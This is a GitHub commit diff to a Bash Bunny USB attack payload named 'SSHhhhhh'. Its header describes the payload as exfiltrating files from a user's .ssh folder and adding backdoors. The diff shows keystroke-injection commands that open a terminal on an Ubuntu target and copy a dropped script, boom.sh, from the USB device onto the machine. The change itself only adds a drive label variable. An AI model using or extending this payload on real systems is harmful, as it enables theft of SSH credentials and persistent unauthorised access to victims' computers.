Update payload.txt

Added BashBunny drive label variable as suggested by @hak5peaks
pull/375/head
WWVB 2024-08-24 09:49:52 -04:00 committed by GitHub
parent 83f8d9cb43
commit 1c2199298a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 5 additions and 3 deletions

View File

@ -1,12 +1,14 @@
# Title: SSHhhhhh # Title: SSHhhhhh
# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors # Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
# Author: WWVB # Author: WWVB
# Props: Hak5Darren # Props: Hak5Darren, hak5peaks
# Version: 1.0 # Version: 1.1
# Category: Exfiltration w/Persistence # Category: Exfiltration w/Persistence
# Target: Linux Ubuntu 18.04 LTS # Target: Linux Ubuntu 18.04 LTS
# Attackmodes: HID, Storage # Attackmodes: HID, Storage
DRIVE_LABEL="BashBunny"
#!/bin/bash #!/bin/bash
LED SETUP LED SETUP
@ -19,7 +21,7 @@ QUACK CTRL-ALT t
QUACK DELAY 100 QUACK DELAY 100
# Drop primary payload on the box # Drop primary payload on the box
QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh . QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh .
QUACK ENTER QUACK ENTER
QUACK DELAY 50 QUACK DELAY 50